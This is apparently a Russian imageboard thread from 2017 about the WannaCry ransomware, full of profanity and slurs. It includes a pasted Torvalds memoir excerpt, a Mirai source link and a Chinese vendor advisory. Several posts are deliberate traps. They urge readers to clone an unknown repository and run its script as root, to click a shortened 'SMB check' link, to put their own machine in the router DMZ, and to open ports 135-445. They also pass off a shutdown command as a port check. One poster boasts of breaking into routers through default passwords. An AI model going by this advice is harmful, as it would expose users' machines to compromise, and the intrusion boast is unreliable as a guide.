Как вирус достучится до 445 через роутеры мира?
с ъ е б и
Кстати, если пошла такая тема, то поясните за веракрипт.
Сколько сижу, одна мысля в голову пришла, а какие именно папки этот пидр шифрует? Или он орентируется на расширение файла? Просто до этого был шифровальщик, который ебошил онли базы 1С, и папку "Мои документы". Просто мб он шифрует определенные папки, их вычистить и спать спокойно.
Чет на почве происходящего захотелось познать информационную безопасность в целях самообразования.
Что нужно знать и какие книги-ресурсы-прочее можно проштудировать, чтобы вкатиться?
Что нужно знать и какие книги-ресурсы-прочее можно проштудировать, чтобы вкатиться?
Ещё есть
https://www.youtube.com/watch?v=XMm0HsmOTFI
Но оба фильма заангажированы в чью-то пользу больше про Open Source и ядро Linux, чем про Free Software и GNU/Linux, помните об этом.
Ну, найди учебник для СПО по инф. безопасности, там про типы шифрования рассказывают, а дальше гугли. ну или в pr спроси
Что-то как-то пиздят в вики, финн никуда не к кому не приходил и его никто не звал. Он хакал говно ось под никому ненужный уже тогда синклер. И далее сносит дос со своего пука, но поставить юникс он соснул, и начались пляски с гнушниками, причем его поделие должно было стать времянкой. Там вся ось по сути набор утилит которые должны в какой-то среде работать.
Батя звонит и спрашивает "Че за хуйня, приедь почени", спрашиваю про роутер(перезагрузи).
Говорит такаяже хуйня и и ебащит по клавиатуре кулаком как мясник тесаком.
Говорит такаяже хуйня и и ебащит по клавиатуре кулаком как мясник тесаком.
>хакер итт
>рассказал очевидную хуйню
Походу поставил ос х не на мак, и теперь на каждом углу кричит
>рассказал очевидную хуйню
Походу поставил ос х не на мак, и теперь на каждом углу кричит
2048-битное RSA шифрование ;)
Какой же питушиный кде я там увидел. Не ходите по этим ссылкам. Там прыщи.
Хотел было посоветовать http://kb.defcon.su/#!beginners.md , но по структуре там лютая дичь, полезного пока мало.
Да никак. Просто в офисе кто-нибудь один заражает свой комп классическим способом (вирус из кряка/почты/порносайта), а затем оно через SMB ебошит все остальные компы в той же сетке.
Хотел было посоветовать http://kb.defcon.su/#!beginners.md , но по структуре там лютая дичь, полезного пока мало.
Тебе нужно шифровать собственные файлы?
А что пояснять? Под виндой-то других вменяемых вариантов (хотя бы с открытой реализацией) и нет вроде как, кроме проприетарного битлокера, который, во-первых, только в pro версии доступен, а во-вторых, который как минимум пару раз уже обходили.
Стопе а разве Гидры с хешкетами умеют дешифровывать RSA в 2048?
Никто не может (пока что).
А как конторы антивирусные обещают дешифровать словивших, чуть ли не к понедельнику выпустить проги, так просто пиздят, где же они ключи возьмут?
У тех кто заплатил, типо на 99% всё зависает, насколько похер этим авантюристам, специально наказывают доверчивых? Или это кому-то одному так повезло?
У тех кто заплатил, типо на 99% всё зависает, насколько похер этим авантюристам, специально наказывают доверчивых? Или это кому-то одному так повезло?
>финн никуда не к кому не приходил и его никто не звал
Не позволяю себе спизнуть того, о чём сам не знаю - так что читай https://ru.wikipedia.org/wiki/Just_for_fun ну или сам Линус спизнул - тут уж я за что купил, за то и продаю:
IV.
Добро пожаловать в Кремниевую Долину. В этой странной галактике мне
сразу пришлось столкнуться со звездами.
Я получил мейл от секретаря Стива Джобса о том, что тот будет рад со
мной встретиться, если я смогу уделить ему час-другой. Я ответил: конечно,
хотя и не понимал, к чему бы это.
Встреча состоялась в штаб-квартире Apple в аллее Бесконечного цикла.
Меня встретили Джобе и его главный технарь Эви Теванян. В то время Apple как
раз начала работать над OS X, операционной системой на базе Unix, которую им
удалось закончить только к сентябрю 2000-го. Встреча проходила неформально.
Сначала Джобе пытался меня уверить, будто в области настольных компьютеров
есть всего два игрока: Microsoft и Apple, и что для Linux, будет лучше
всего, если я подамся в Apple и привлеку сообщество, работающее с открытыми
исходниками, к созданию Mac OS X.
Я продолжал разговор, потому что мне хотелось побольше узнать об их
новой операционной системе. В ее основе лежит микроядро Mach, разработанное
в Университете Карнеги-- Меллона. В середине 90-х ожидалось, что Mach станет
венцом операционных систем, и многие им интересовались. На самом деле IBM и
Apple использовали Mach как основу своей злополучной совместной операционной
системы Taligent.
Джобе особо упирал на то, что низкоуровневое ядро Mach является
открытым. Тут он несколько блефовал: какой толк от того, что базовая
операционная система -- слой нижнего уровня -- открыта, если над ней лежит
Mac-уровень и он закрыт?
Понятно, Джобе не знал, что сам я невысокого мнения о микроядре Mach.
Если честно, я считаю его полной мурой. Оно содержит все конструктивные
ошибки, какие только можно придумать, и еще некоторые сверх того. Одним из
аргументов против микроядер всегда была их низкая производительность.
Поэтому существовало множество исследований для определения того, как
заставить микроядро по-настоящему хорошо работать. Все полученные
рекомендации были воплощены в Mach. В результате получилась очень сложная
система со своими собственными законами. Но она все равно была не слишком
эффективной.
Эви Теванян работал над Mach еще на стадии университетского проекта.
Мне было интересно обсудить проблемы, волновавшие их со Стивом. В то же
время мы принципиально расходились по техническим вопросам. Я не видел
смысла для специалистов по открытым исходникам и Linux ввязываться в это
дело. Конечно, я понимал, зачем они хотели привлечь разработчиков открытого
ПО к своей системе: они видели огромный потенциал Linux-сообщества. Не
думаю, впрочем, что они осознавали его полностью. Вряд ли Джобе понимал, что
у Linux потенциально больше пользователей, чем у Apple, хотя
пользовательская база у них и разная. И вряд ли Стив так же решительно отмел
бы Linux в качестве операционной системы для настольных компьютеров сегодня,
как сделал это три года назад.
Я объяснил, чем мне не нравится Mach. Легко понять, что это не вызвало
у моих собеседников энтузиазма. Безусловно, они и раньше слышали эти
аргументы. Я был явно зациклен на Linux, а Теванян -- на Mach. Было
интересно послушать их рассуждения о технических вопросах. Одна из очевидных
для меня проблем заключалась в поддержке новой операционной системой старых
Mac-приложений. Они планировали справиться со всеми старыми программами с
помощью уровня совместимости. Все старые приложения должны были работать с
помощью нового дополнительного процесса. Но один из главных недостатков
старой Mac-системы -- это отсутствие защиты памяти, а такое решение его
никак не устраняло. Получалось, что защита памяти будет реализована только
для новых приложений. Мне это казалось бессмысленным.
Наши взгляды на мир расходились кардинально. Стив был Стивом, точно
таким, каким его рисует пресса. Он был поглощен своими целями, в особенности
маркетингом. Меня интересовала техническая сторона и не очень волновали ни
его цели, ни аргументы. Основной его аргумент был в том, что если я хочу
завоевать рынок настольных компьютеров, то должен объединить силы с Apple. А
мне это было до лампочки. Зачем мне нужна Apple? Я не видел в ней ничего
интересного. И я не ставил целью своей жизни завоевание рынка настольных
компьютеров. (Сейчас дело идет именно к этому, но я никогда не ставил себе
такой цели.)
Его аргументация не блистала разнообразием. Он просто считал само собой
разумеющимся, что я буду заинтересован. И оказался в тупике -- у него в
голове не укладывалось, что кого-то может совершенно не волновать увеличение
рыночной доли Маков. Похоже, он был искренне поражен, как мало меня волнует
размер рынка Маков и размер рынка Microsoft. И его трудно винить в том, что
он не знал заранее, как сильно я не люблю Mach.
>А как конторы антивирусные обещают дешифровать словивших, чуть ли не к понедельнику выпустить проги, так просто пиздят, где же они ключи возьмут?
Да, пиздят. Бизнес, все дела.
Виснет скорее всего что вирус шифрует и системные файлы винды , а расшифровать им нахуй не надо это надо ещё сервер поднимать для хранение ключей и ещё как его надо спрятать от очень люботных крыс
Это какой-то ost из игры? Название напишите, пожалуйста.
Battletoads
TMNT, блять.
Ему нужно в порт стукнуть, чтобы активироваться, все равно. Тут писатели вируса продолбоебились.
Это про поход в эпл, когда уже он успешен. Давно где то читал
Про начало истории, до встречи с Столлманом и работы уже над осью совместно, он сычевал и гнушникам он был не известен, и любви к нему не было, те всё до сих пор мечтают на своё ядро посадить, только поезд уже ушёл как лет 15 назад.
>Вряд ли Джобе понимал, что
>у Linux потенциально больше пользователей, чем у Apple, хотя
>пользовательская база у них и разная. И вряд ли Стив так же решительно отмел
>бы Linux в качестве операционной системы для настольных компьютеров сегодня,
>как сделал это три года назад.
Вот это манямирок, ах ты ж ёбаный ты нахуй.
Если спермобляди сосут , почему ещё не кто не стал писать свою еба реализацию на эту уязвимость , мвже все знаем как смерпрбляди любят обновляться ?
Скоро в каждом кряке на торрентах, ещё не вечер. Кто поумнее будет пилить, сделают так чтобы сами ставили, ещё и с правами, и чтобы скрытно ничего не вылазило и начинала кидать на всех кого возможно в сети. Тогда сервер будет не нужен.
Поясните колхознику. Если я введу эту команду из оп-поста через повершелл, уязвимость исчезнет?
SUP /b/ Сканю роутеры на дефолтные пароли к вебмордам смотрящим в интернет. Захожу и подрубаю dmz на какой либо комп, лол. Уже штук 50 пробросил. Пиздец я аутист Как думаете, там уже сидит наш вайрус?
Пока не сделают следующую. Плюс ты лишаешься работы этого протокола.
В целом верно, но на собеседование он таки ходил
Тоже всё так. Разве что:
> до встречи с Столлманом и работы уже над осью совместно
Встречались они, насколько мне известно, только один раз, и то Линуса его однокурсник затащил на лекцию Столмана, с которыми тот и до сих пор по миру катается. Они как не общались, так и не общаются.
Похоже, ты с чем-то пытаешься спорить, но я не могу понять, что и где не так-то?
я не пойму как этот график работает анон? вот ставвлю я минуту - это сколько работает компов или сколько нашлось зраженных за эту минуту? почему оффлайн и онлайн за 5 мин и 1 мин так отличается? че за бред не пойму
https://intel.malwaretech.com/botnet/wcrypt/?t=1h&bid=all
https://intel.malwaretech.com/botnet/wcrypt/?t=1h&bid=all
А как там еба малвар с нейросетью поражающий роутеры называется ? Вот с чем стоит готовить и вместо серверов я бы реализовал меш сеть из устройств но с супер нодами для приёма команд и все это маскировать под торент трафик
а что есть такой? а как узанть поражен ли мой роутер?
>Пиздец я аутист
Ах, это двоякое чувство...
Смотри хеш сумму прошивки роутера
и как ее узнать?
Идиот, в порт оно стукается чтобы распространиться и закачать свое тело на комп. А если тело сам юзверь запустил с админскими правами, чего б ему не выполниться?
блять нихуя нахуй не понятно шо ето за помойка чем грозит и вся хуйня
я не шару вообще в этой пидорской системе
я не шару вообще в этой пидорской системе
И что я теряю? И что нужно делать, если стоит пиратская семёрка?
>я не шару вообще в этой пидорской системе
Ну и нахуя она тогда тебе вообще нужна, довен? Сноси не и не парься, говн.
По типам файлов шифрует, на гите есть перечень расширений ~50шт. 1с в нем прям вот так вот нету, хотя sqlчетатам есть.
Помню что название что то на японском и были выложены исходные коды в окрытый доступ
и аас и огг нет. фу, лоховской вирус
В осном на офф сайте производителя должна лежать прошла и сумма прошивки вот с ней и сверяешь
>что нужно делать, если стоит пиратская семёрка?
перейти на линупс, очевидно же!
Бля нихуя вы дауны. Проиграл с вас. Взломы электростанций, скрытные товарищи через ту же дырку. Лол. Просто пиздец. Стыдно что сижу тут с вами
ок, щас сверю
То что скоро каждый школьник будет ебать твой пк во все его порты , если ТВ любитель торентов
> второй шебм
Либерашье огниво из-под диктора весьма благодатно - вот это подрыв.
Ну так а что хочешь от хомяков играющих в сру маил игры ?
Ты серьезно такой дебил?
С хуяли на линуксе он будет?
Там уязвимость была в SMB винды. Пиздец, даун
Ты хоть сам то проверил что вкинул? , пойми что бы в пинусе что заработало сначала как то надо от конфигурировать систему под запускаемый софт , этот криплолокер ахует от зоопарка в линукс мирке
Ну не стукай, гнида.
Бсыстрая проверка на наличие уязвимостей в вашей системе
http://tinyurl.com/l8fv848?_SMB_PORTCHECK
http://tinyurl.com/l8fv848?_SMB_PORTCHECK
Дурак чтоли? openssl есть в любом дистре.
Попробуй сам.
1. git clone https://github.com/anashansson/crylnx.git
2. cd crylnx
3. chmod +x test.sh
4. sudo bash ./test.sh
5. ???
6. PROFIT!
Антивирус не дает установить.
Мне насрать. Как там всё на самом деле было никто не знает, может они только в жопу пердолились и в программирование вообще не умеют. А этих ебаных биографий про всяких дельцов кучи, одна охуенне другой, один величие гения другого. В революшен ос вообще на актеров смахивают. А факт один, шиндовс дырка, тысяча индийцов так и не справилась, а все боссы не умнее бати танкиста, лишь торгуют хлебалом. Юниксоид в своем истинном виде, без иксов, набор еба комманд полумашинного смысла на черном экране, труда там больше вложено чужого, а своим распространением и поддержкой они больше обязаны всё тем комерсам и проприетарам которые её просто юзают для себя и продают под свои нужды, потому что халява. А все эти сказки про народную ось, про настольную юзабельность, идеи её распространения и историю создания, и прочий юношеский максимализм, я давно не верю, и срал с высокой колокольни на этот коммунизм. Пердолиться в терминале и сидеть без дров удел красноглазых прыщей.
>а линукс тоже сделали криптолокер
>#!/bin/bash
>if [[ $(id -u) -ne 0 ]] ; then echo "Please run as root" ; exit 1 ; fi
>Здравствуйте, я таджикский вирус.
>еба малвар с нейросетью поражающий роутеры называется
mirai - https://github.com/jgamblin/Mirai-Source-Code
Только не было там никакой нейросети, ёбнулся что ли - ставка была на жадных буржуев, которым главное - продать оборудование на базе китайского чипшита, а какая там безопасность, всем было похуй. Клиент-то платит! Вся атака сводилась к перебору стандартных логинов/паролей (около ~20 штук, не больше - вшиты прямо в бинарь) с последующем запуском себя же, и так по всему интернету. Ну а через управляющие сервера потом просто заражённые устройства слали пакеты на адрес жертв, из-за чего происходил банальный DDoS. Ну а поскольку под раздачу попал один из DNS-сервисов, интернеты немного слегли.
Но, да - даже про mirai по федеральным СМИ никто ничего не рассказывал. Сейчас ситуация несколько эпичней.
Не говоря уже про Рут права и исполнение , и я молчу про симлинки и всякие монтируешие фс , я к тому клоню что криптор на пинусе писать не рентабельно да и к тому же юзеры на порядок опытней, а какому говновирусописателю нужно что б кто то без в его код , слишком много рисков без выхлопа
КОГО?
>if [[ $(id -u) -ne 0 ]] ; then echo "Please run as root" ; exit 1 ; fi
А почему ты рассказываешь об этом так, словно это прошло? Он всё ещё существует.
Мое, че хотел?
Хорошая попытка!
Есть какая-нибудь группа риска или это чистый рандом?
Твоя киска.
Сказать что все нормально у тебя.
Ты жопой читаешь, идиот?
Ну как вы там, потомки? Все порты закрыли?
открой порты 135-445 и будет тебе веселье
А то я без тебя не знаю.
> Дурак чтоли? openssl есть в любом дистре.
> Попробуй сам.
> 1. git clone https://github.com/anashansson/crylnx.git
> 2. cd crylnx
> 3. chmod +x test.sh
> 4. sudo bash ./test.sh
> 5. ???
> 6. PROFIT!
Проиграл во весь голос ты блядь деграданг полный , сука вообще ахуели мало того что я должен клонировать твоё репо так я должен ковырять что б это говно запустилось без отсутствующих либ в моей Генте ? Так ы блядь ещё должен СДЕЛАТЬ ЕГО ИСПОЛНЯЕМЫМ ,Карл ИСПОЛНЯЕМЫМ я молчу про выполнение скрипта от РУТА ,КАРЛ ОТ РУТА !!!!
>if [[ $(id -u) -ne 0 ]] ; then echo "Please run as root" ; exit 1 ; fi
>вирус под линукс
Надо добавить свой Lan IP в DMZ своего роутера, тогда будешь как за каменной стеной, рили.
>Так ы блядь ещё должен СДЕЛАТЬ ЕГО ИСПОЛНЯЕМЫМ ,Карл ИСПОЛНЯЕМЫМ я молчу про выполнение скрипта от РУТА ,КАРЛ ОТ РУТА !!!!
СССУКА, ОРУ В ГОЛОСИНУ
>if [[ $(id -u) -ne 0 ]] ; then echo "Please run as root" ; exit 1 ; fi
Хакир вкатился в тред
Спасибо антош mirai
оно ещё живо
Проорал с нетсталкера.
Я вообще кабель нахуй выдернул пока.
Скажите мне, пожалуйста, хуле все ебутся с реестром и powershell если можно просто написать:
> dism /online /norestart /disable-feature /featurename:SMB1Protocol
?
> dism /online /norestart /disable-feature /featurename:SMB1Protocol
?
Поясни
Ты охуенен, анон, вчера в тредах на повторе этот трек слушал, вот в голове представлял как раз такое же, только безрукий уёбок, бля. Спасибо.
dism по умолчанию не уставновлен. Хули там ебаться то, одна команда и все.
Капчуешь с холодильника?
Вот понимаешь, это ведь просто команда. А вот когда ты сам создал файл и вписал значение, что ли спокойней от этого.
Там паста мелкософта как отключать.
Что за трек?
С планшета.
Спасибо, братишка.
Чет нехуя ЧЯДНТ? Автор почините свой вирус плиз
Поставил необходимую обнову седьмой винды, теперь я защищён или ещё какая-то залупа?
Миру не пизда?
Добавь свой Lan IP в DMZ своего роутера, тогда будешь как за каменной стеной, рили.
Напомните команду для проверки портов в CMD
nmap
Ведро неуязвимо же.
Заценим, благо вебм зашла. Три часа слушал.
В винде shutdown /s /t 0
Пока виндобляди срут кирпечами , прищебляди пытаются опыт и пишут свой криптолокер но мы все знаем что как бы линусод не ебался виндобляди всеравно соснули
Ты поставил анальную слежку от десятки и новый бэкдор для анб.
Откуда вы лезете , ссаными тряпками тебя надо пиздить, что вообще за хуйня ?
Что есть t это в минутах? и s?
Выключение компа, немедленно.
Ну так там анон для развлечение начал писать локер для пинуса , видимо обида ебанная , но нехуя у него не получается
ДОЛБОЕБЫ, ПИЗДЕЦ! Как можно им заразиться??? Где некоторые нашли эту хуйню? И вообще, где вы находите вирусы? КАК БЛЯТЬ???
открой порт 135 и 445
Иди шапку треда читай долбич
В бухгалтерии Марины Васильевны, отчёты полетели начиная с 2009 года;)
Сканер даркнета
А вот за IDKFA добра тебе , пойду в брутал дум залипну
Объясните кто-нибудь русским языком, что такое переполнение буфера, читал как-то, но нихуя не понял.
На семерке вроде бы скажет что нет прав.
Это что вообще андроид ? Нахуя какие то гуи ?
Можно попасть в незаконный участок памяти и вписать туда что-то.
Пиздос, что обсуждать третий день, неужели кто-то еще ловит эту хуйню?
есть некая область в памяти, которая имеет фиксироанный размер, данные дута загружаются, выгружаются.
Может произойти так, что данных будет много, и буфер будет переполнен, и если это не предусмотреть, но система может заглючить, и в данном случае запустить вредоносный код или совершить какое-то действие, тем самым предоставив например доступ к компьютеру
Под винду. Классный гуи, ничего ты не понимаешь
Конечно, АНБ старается что бы Антивирус Касперского мог подзаработать. долбоеб
у мя піратская вінда, я ж із деревні
тоесть у мя обнові нет тогда етой с вірсом?
Будто в мире только Касперский.
Мимо
Экспертам не до сна, когда ЧП мирового масштаба
петух плохо закосил под хохла, пыня платит по 15 рублей за пост
https://ru.wikipedia.org/wiki/Переполнение_буфера
Понятно же написано, с картинками даже и примерами. Что именно не ясно?
Хахол плес.
А нас по информатике один год вёл препод молодой, показывал, как можно пользоваться приватными методами снаружи, показывал как юзать переполнение буфера, много чего показывал, потом исчез. Только теперь понимаю, сколько я упустил.
Ойййй да какое ЧП тут русские спецслужбы всё оперативно остановили.
Ну и бред. Тот кто это придумал особый даун.
Ты сразу взорван будешь. А из кинескопа элт монитора твоего потечет сало.
Wtf? Когноед сраный , для них блядь кали таилсы собирают , пожалуйста пользуйстесь будте людьми , нет мы долбаебы и хотим кликать в Винду и орать что мы хакеры ... Это зашквар на будущие , это как программисты на маке , они есть но это или пидоры или веб макаки но они есть ...
Странно как вы сайты пишете, или админки там на пхп. Хотя, если таких основ не знаете, то походу с вебом в рашке все печально
Пиздец вы выродки из за пиара этой темы теперь малолетние уебки будут обновлять и качать антивирусы и моему заработку придет пиздец
Кто вы блять? Я на дваче капчу дрочу, сайт последний раз в школе создавал из трех строк
> кали таилсы
Начитался умных слов, а значение не узнал?
Это 2 разных дистрибутива, под разные задачи
Сколько у автора уже на счетах бабала?
Говна поешь, даун.
Хуево быть тобой
>как можно пользоваться приватными методами
Как? Они же приватные.
>кали таилсы
Ты насмотрелся фильмов и сериалов.
А ну поясни как пж, как ты получаешь доступ к морде из вне ? Она ведь доступна только из локальной сети ?!?!?!
Ну типа вот так, все поля класса приватные, показывал, как можно снаружи получить доступ к этим полям несмотря на то, что они приватные.
Ну хуй знает, мне не особо интересно в говне разбираться, которое даже сделать нормально ее могут, судя по этому посту
Деб поясняю таил нужен как хост кали в виртуалке ... Используешь по типу whois'а
Если тут одна слитая дыра(известная с 2006г) от АНБ так не илюзорно ёбнула что там майки ещё могли под них подставить в случае кибервойны с условной рахой, это же пиздец товарищи!
Ну так что ещё школьники могут юзать ?
Просто обращаешься по полному адресу и похуй, в wan это такое же самостоятельное устройство, которое можно выебать в морду
Что то не понимаю, они для того и приватные, чтобы никто к ним доступ снаружи не получил. Может так конкретный компилятор какой уязвимый был?
Пол россии так живет. И вот результат. Укросин запустил вирус написанный на делфи и пол страны теперь воет
Не, стандартный Ц++
*Укросвин
Около 15 килоденег.
>таил нужен как хост кали
Это идиотизм. Начнем с того что берём дебиан без нескучных обоев и больше нихуя не выдумываем.
Ну так я имел ввиду что это основные диструтивы , но очень удобны для использования на временной машине
Даже мб вспомню покурю, лол. Он вообще крутой чел был, да, ща вот думаю точно какой-то хацкер, за тот год по инфе больше узнал чем за всю жизнь и потом на сотку сдал всё и поступил и вообще определился с профессией. Мб для отвода глаз устроился в школу.
>как ты получаешь доступ к морде из вне ? Она ведь доступна только из локальной сети ?!
Не всегда. В этом и есть одна из особенностей китайского чипшита, который не всегда безопасно донастраивают.
Да всем похуй на раху, кибератака не была сфокусированной, просто это у нас в стране лицуха только у 1 на 100 пользователей и как следствие обновления так же получали только 1 из 100.
И интернет-гигиены в России нет как таковой.
Вот и вышло так что Рашка получила заражений куда больше чем более цивилизованные в цифровом плане страны.
Очередные теории заговора, ну как дети, блядь.
Хуя лохов то. Вроде вчера сбрасывали ключ который внизу вставлять нужно, он каждому подойдет или там уникальный нужен?
Согласен , но большинству школьников мамкиных хакеров на винде проще будет юзать кали где все из коробки и
16 биток было - около 25к бачей
дебс
Человек не должен разбираться как устроен пылесос или калькулятор. И разбираться с его техническими проблемами. Он пользуется его функциями. За все поломки и неисправности должен отвечать производитель, и в данном случае это обеспечено очень плохо. Вообще система, с точки зрения дизайна охуительно неудобно устроена для неподготовленного пользователя кратко говоря для не погромиста.
зачем?
Есть же неска
При чём тут конкретно раха я тебе открыто сказал что >слитая дыра от АНБ
А теперь представь какие там не слитые бекдуры и сколько их!
Типичная потреблядь. Зачем я должен в чем-то разбираться, я хочу просто пользоваться. Иди на хуй отседава
Total Transactions: 112
Total BTC Received: 16.45162378BTC
Total Est. USD: $29215.61608971
я не могу жить без smb
Им ведь нужно серин скинуть на двач нежели проштрудировать дебианвики арчвики или хенбук
купи роутер
Повезло тебе, хороших преподавателей сегодня мало, особенно по таким предметам. У нас в вузе были некомпетентные учителя, которые элементарных вещей не знали, таких, которые даже я знал. А еще были по некоторым предметам, тоже с it связанным учителя, вчерашние выпускницы этого же вуза, тупые пезды, которые максимум word смогли освоить. Тупо с листочка лекции зачитывали. Вот эти просто неимоверно бесили.
Нани?
Случаем код на доске мелом не писали ?
У нас был препод, выебывался, что он дохуя линуксоид. Как-то спросил его как перенести систему с компа на комп, грубо говоря собрать свой дистр.
Так этот дебич слился.
Спросил его как-то что лучше ngix или апач. Грит апач. Проиграл с дауна, больше к нему на предметы не ходил.
Анон подскажи, у меня обычный комп, не сервер не клиент сети. Я хочу вырубить все три версии SMB протокола, первую уже удалил вместе с драйвером, будут ли последствия отключения smb 2,3 ? Повлияет ли на какие нибудь программы? Подскажи?
Потреблядок. В то время, как ты будешь ебаться с гарантийным ремонтом своего калькулятора и ждать месяцами, я его починю за пол часа.
Раньше лошьё деньги на номер телефона отправляли. С битками есть потенциальная возможность обратной связи?
KANSEI DORIFTO!
На доске нет, а вот в тетрадь ручкой писали, было дело.
Давно
Помню еще ставил потом на свои компы kubuntu
Пиздец зашквар
> Как-то спросил его как перенести систему с компа на комп, грубо говоря собрать свой дистр.
Подробнее чет не понял , ты что LFS систему пытался собрать ?
Тут парнишка скинул его потролили декриптором который застопорился на 99%
PS. Это была лабораторная работа, лол. Да, надо было писать программу ручкой в тетради.
Вспомнил и сам проиграл в голосину, лол.
ну и в чем проблема тогда?
>ngix или апач
Выбор долбоёбов.
нет, я уставил тогда дебиан, поставил туда пару программ, что-то еще. И хотел все это перести на ноут, а все по новой не хотел ставить. А в башскрипты я немогу
Как же это стремно , я в школе бейсик так писал , досихпор карежит
напомни, что там сейчас модно?
поди http сервере на nodejs?
Разбираюсь во всем и ни в чем одновременно.
Как узнать сколько машин заражены в конкретной стране?
Закрой порт на нём извне, в своей сети открой.
То что я юзаю l2tp vpn без ipsec
Перекат пилите
Антош ты чего , для этого есть dad
Тема себя изжила.
Вот вы тут сидите шутки шутите, а теперь осознайте для чего нужна национальная ось или хотя бы переход всех важнейших станций как РЖД, мусарня, АЭС и прочих на линуксы. Майки ещё раз доказали что эти гниды сливают нас же АНБ без вопрос раз что бы залепить дырку 11 летней давности им потребовалась СУКА АТАКА ПО ВСЕМУ ЕБАНОМУ СВЕТУ ГРОБ ГРОБ КЛАДБИЩЕ И ПИДОР! Так что либерахи которые стебут создателей национальной ОСи пройдите нахуй!
Может это он так потролил? Какой там механизм интересно.
Dd
/Fix
Сейчас я вас всех блядь взломаю, допиздитесь тут.
Кто пустил в тред пердолика?
Толсто.
Уебывай!
Тут эксперты сидят и решают мировую проблему!
Даже если вирус миновал, то мы должны анализировать данные и создать защиту.
А разворачивал бы я ее потом чем?
Ты читаешь тред жопой. Уёбывай, тут тебе не рады.
Да нет глянь в гиф в оп посте, парниша часов 6-10 пытался разблокировать сказал что большая часть разлочена, но осталась эта хуита которая не закрывается.
Аноны, смотрите что мне сегодня утром пришло на телнфон:
您的珍貴資料可能正在離您遠去,WanaCrypt0r 2.0席捲全球近百個國家
May 13, 2017 · By Cheetah Mobile
獵豹移動安全實驗室(Cheetah Mobile Security Research Lab.)提醒您務必注意今晨嚴重爆發的安全新聞,特別是如果您的 Windows Update (開始 ->控制台 -> Windows Update) 狀態還跟圖1一樣,務必趕快按下檢查更新,或者檢查您的Windows版本,如圖2所示,下載安裝下方提供的2017年5月的安全性更新。不然,您可能至少需花費300美金才有機會保住您的珍貴資料與回憶。
圖1. Windows Update
圖2. 更新檔下載及安裝中
【Microsoft 2017年5月 安全性更新】
Windows 7 x64
http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows6.1-kb4019264-x64_c2d1cef74d6cb2278e3b2234c124b207d0d0540f.msu
Windows 7 x32
http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows6.1-kb4019264-x86_aaf785b1697982cfdbe4a39c1aabd727d510c6a7.msu
Windows 8.1 x64
http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8.1-kb4019215-x64_d06fa047afc97c445c69181599e3a66568964b23.msu
Windows 8.1 x32
http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8.1-kb4019215-x86_fe1cafb988ae5db6046d6e389345faf7bac587d7.msu
Windows XP、WindowsServer 2003微軟官方緊急發佈此事件的特殊更新
https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
【WannaCrypt0r 2.0 (WannaCry) 感染背景】
勒索軟體是近幾年常見的一種電腦病毒,當您的電腦被感染後,所有檔案都會被加密鎖住成無法打開的檔案類型,主要是勒索贖金,通常金額為數百美元不等,只要支付就可解鎖(但也可能無法解鎖)。而這次爆發的WannaCry就是利用前陣子Shadow Brokers揭露了秘密網路攻擊組織 Equation Group 所使用可以攻擊入侵Windows XP 至 Windows 8 及其各自對應的版本等多個EternalBlue、EmeraldThread漏洞;通過445埠在內網進行蠕蟲式感染傳播的Windows SMB 遠端執行程式碼弱點進行攻擊,如果沒有安裝安全軟體或及時更新系統安全性更新的其他內網用戶就極有可能被動感染。
如圖3及圖4所示,Microsoft已在2017年3月發佈了MS17-010-重大的SMB伺服器安全性更新(40113389),修復相關安全性漏洞;但根據目前網上所曝光的災情,估計仍有不少機構及個人用戶未定期安裝 Windows 系統更新的習慣;因此,包括俄羅斯、台灣、英國、西班牙、土耳其、越南、菲律賓、日本、義大利、葡萄牙和烏克蘭共 11 國在內都已傳出嚴重災情;其中,英國國家衛生事務局 (NHS) 旗下多間醫院及西班牙電訊公司 Telefonica 等,甚至因此無法正常運作。中國境內多個大學也已爆發感染傳播事件,甚至包括機場航班資訊、加油站等終端系統遭受影響。
圖3. Microsoft資訊安全公告 MS17-010-重大
https://technet.microsoft.com/zh-tw/library/security/ms17-010.aspx
http://www.catalog.update.microsoft.com/search.aspx?q=4012215
圖 4. Microsoft Update Catalog
【此次利用漏洞影響以下版本的作業系統】
Windows XP/Windows 2000/Windows 2003 (微軟已不再提供安全升級,請關閉445埠)
Windows Vista/Windows Server 2008/WindowsServer 2008 R2
Windows 7/Windows 8/Windows 10
Windows Server 2012/Windows Server 2012 R2/Windows Server 2016
【防禦措施建議】
由於微軟早已停止 Windows舊版本等技術支援,而該勒索軟體主要透過445埠來傳播,因此,除了安裝安全軟體及定時安裝更新與定時備份外,提供幾個方法,供用戶檢查保護自己的電腦。
如圖5與圖6所示,首先請至電腦管理 (開始->執行->compmgmt.msc->服務)停用的TCP/IP NetBIOS Helper以及Server等服務,並且啟動如圖7所示之Windows Update (Windows 7以上的用戶務必「隨時保持最新安全的更新」);此外,更要切記收到E-Mail,千萬不要隨意點擊E-mail裡的連結,這樣才能保護您的珍貴的資料與回憶,讓您的電腦遠離勒索軟體的威脅。
圖 5. 停用電腦管理的TCP/IP NetBIOS Helper
圖6. 停用電腦管理裡的Server
圖7. 啟用電腦管理裡的Windows Update
您的珍貴資料可能正在離您遠去,WanaCrypt0r 2.0席捲全球近百個國家
May 13, 2017 · By Cheetah Mobile
獵豹移動安全實驗室(Cheetah Mobile Security Research Lab.)提醒您務必注意今晨嚴重爆發的安全新聞,特別是如果您的 Windows Update (開始 ->控制台 -> Windows Update) 狀態還跟圖1一樣,務必趕快按下檢查更新,或者檢查您的Windows版本,如圖2所示,下載安裝下方提供的2017年5月的安全性更新。不然,您可能至少需花費300美金才有機會保住您的珍貴資料與回憶。
圖1. Windows Update
圖2. 更新檔下載及安裝中
【Microsoft 2017年5月 安全性更新】
Windows 7 x64
http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows6.1-kb4019264-x64_c2d1cef74d6cb2278e3b2234c124b207d0d0540f.msu
Windows 7 x32
http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows6.1-kb4019264-x86_aaf785b1697982cfdbe4a39c1aabd727d510c6a7.msu
Windows 8.1 x64
http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8.1-kb4019215-x64_d06fa047afc97c445c69181599e3a66568964b23.msu
Windows 8.1 x32
